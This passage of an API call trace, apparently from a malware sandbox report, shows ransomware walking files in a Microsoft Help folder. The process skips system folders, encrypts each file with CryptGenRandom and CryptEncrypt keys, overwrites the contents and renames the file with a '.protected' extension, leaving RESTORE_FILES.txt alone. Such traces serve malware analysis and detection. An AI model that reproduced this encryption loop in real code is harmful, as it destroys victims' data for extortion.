hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x146, lpOverlapped=0x0) returned 1 [0072.526] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.526] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x146, lpOverlapped=0x0) returned 1 [0072.527] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.527] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.527] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.527] CloseHandle (hObject=0xa4) returned 1 [0072.527] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn.protected") returned 64 [0072.527] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn.protected")) returned 1 [0072.528] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.528] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="Windows") returned -1 [0072.528] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="Program Files") returned -1 [0072.528] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.528] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.528] lstrcmpiW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.528] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn") returned 54 [0072.528] StrStrIW (lpFirst="MS.MSPUB.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.528] lstrcmpW (lpString1="MS.MSPUB.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.528] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.528] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.528] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.532] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn") returned 54 [0072.532] StrStrW (lpFirst="MS.MSPUB.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.532] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn") returned 54 [0072.532] StrStrW (lpFirst="MS.MSPUB.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.532] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn") returned 54 [0072.532] StrStrW (lpFirst="MS.MSPUB.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.532] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x146, lpOverlapped=0x0) returned 1 [0072.533] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.533] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x146, lpOverlapped=0x0) returned 1 [0072.533] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.533] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.533] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.533] CloseHandle (hObject=0xa4) returned 1 [0072.534] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn.protected") returned 64 [0072.534] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.14.1033.hxn.protected")) returned 1 [0072.534] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.534] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="Windows") returned -1 [0072.534] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="Program Files") returned -1 [0072.534] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.534] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.534] lstrcmpiW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.535] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn") returned 58 [0072.535] StrStrIW (lpFirst="MS.MSPUB.DEV.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.535] lstrcmpW (lpString1="MS.MSPUB.DEV.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.535] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.535] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.535] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.535] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn") returned 58 [0072.535] StrStrW (lpFirst="MS.MSPUB.DEV.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.535] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn") returned 58 [0072.535] StrStrW (lpFirst="MS.MSPUB.DEV.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.535] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn") returned 58 [0072.535] StrStrW (lpFirst="MS.MSPUB.DEV.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.535] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x15e, lpOverlapped=0x0) returned 1 [0072.536] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffea2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.537] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x15e, lpOverlapped=0x0) returned 1 [0072.537] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.537] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.537] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.537] CloseHandle (hObject=0xa4) returned 1 [0072.537] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.protected") returned 68 [0072.538] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.dev.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.dev.14.1033.hxn.protected")) returned 1 [0072.538] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.538] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="Windows") returned -1 [0072.538] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="Program Files") returned -1 [0072.538] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.538] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.538] lstrcmpiW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.538] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn") returned 55 [0072.538] StrStrIW (lpFirst="MS.MSTORE.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.538] lstrcmpW (lpString1="MS.MSTORE.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.538] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.538] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.538] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mstore.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.538] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn") returned 55 [0072.538] StrStrW (lpFirst="MS.MSTORE.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.539] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn") returned 55 [0072.539] StrStrW (lpFirst="MS.MSTORE.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.539] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn") returned 55 [0072.539] StrStrW (lpFirst="MS.MSTORE.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.539] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x14c, lpOverlapped=0x0) returned 1 [0072.540] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffeb4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.540] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x14c, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x14c, lpOverlapped=0x0) returned 1 [0072.540] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.540] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.540] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.540] CloseHandle (hObject=0xa4) returned 1 [0072.541] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn.protected") returned 65 [0072.541] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mstore.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.mstore.14.1033.hxn.protected")) returned 1 [0072.541] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.541] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="Windows") returned -1 [0072.541] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="Program Files") returned -1 [0072.541] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.541] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.541] lstrcmpiW (lpString1="MS.OIS.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.541] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn") returned 52 [0072.541] StrStrIW (lpFirst="MS.OIS.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.541] lstrcmpW (lpString1="MS.OIS.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.541] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.542] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.542] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.ois.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.542] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn") returned 52 [0072.542] StrStrW (lpFirst="MS.OIS.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.542] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn") returned 52 [0072.542] StrStrW (lpFirst="MS.OIS.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.542] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn") returned 52 [0072.542] StrStrW (lpFirst="MS.OIS.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.542] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x13a, lpOverlapped=0x0) returned 1 [0072.543] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffec6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.543] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x13a, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x13a, lpOverlapped=0x0) returned 1 [0072.543] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.543] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.543] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.543] CloseHandle (hObject=0xa4) returned 1 [0072.544] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn.protected") returned 62 [0072.544] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.ois.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.ois.14.1033.hxn.protected")) returned 1 [0072.544] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.544] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="Windows") returned -1 [0072.544] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="Program Files") returned -1 [0072.544] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.544] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.544] lstrcmpiW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.544] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn") returned 56 [0072.544] StrStrIW (lpFirst="MS.ONENOTE.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.544] lstrcmpW (lpString1="MS.ONENOTE.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.544] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.544] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.545] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.onenote.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.545] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn") returned 56 [0072.545] StrStrW (lpFirst="MS.ONENOTE.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.545] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn") returned 56 [0072.545] StrStrW (lpFirst="MS.ONENOTE.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.545] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn") returned 56 [0072.545] StrStrW (lpFirst="MS.ONENOTE.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.545] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x152, lpOverlapped=0x0) returned 1 [0072.546] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffeae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.546] WriteFile (in: hFile=0xa4, lpBuffer=0x49d448*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesWritten=0x295f3e4*=0x152, lpOverlapped=0x0) returned 1 [0072.546] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.546] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0072.546] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0072.546] CloseHandle (hObject=0xa4) returned 1 [0072.547] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.protected") returned 66 [0072.547] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.onenote.14.1033.hxn"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.protected" (normalized: "c:\\programdata\\microsoft help\\ms.onenote.14.1033.hxn.protected")) returned 1 [0072.547] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0072.547] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="Windows") returned -1 [0072.547] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="Program Files") returned -1 [0072.547] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="Program Files (x86)") returned -1 [0072.547] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="$Recycle.bin") returned 1 [0072.547] lstrcmpiW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="System Volume Information") returned -1 [0072.547] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn") returned 56 [0072.547] StrStrIW (lpFirst="MS.OUTLOOK.14.1033.hxn", lpSrch=".protected") returned 0x0 [0072.547] lstrcmpW (lpString1="MS.OUTLOOK.14.1033.hxn", lpString2="RESTORE_FILES.txt") returned -1 [0072.547] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0072.547] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0072.547] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0072.563] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn") returned 56 [0072.563] StrStrW (lpFirst="MS.OUTLOOK.14.1033.hxn", lpSrch=".txt") returned 0x0 [0072.563] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn") returned 56 [0072.563] StrStrW (lpFirst="MS.OUTLOOK.14.1033.hxn", lpSrch=".rar") returned 0x0 [0072.563] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn") returned 56 [0072.563] StrStrW (lpFirst="MS.OUTLOOK.14.1033.hxn", lpSrch=".zip") returned 0x0 [0072.564] ReadFile (in: hFile=0xa4, lpBuffer=0x49d448, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x49d448*, lpNumberOfBytesRead=0x295f3e4*=0x152, lpOverlapped=0x0) returned 1 [0072.564] 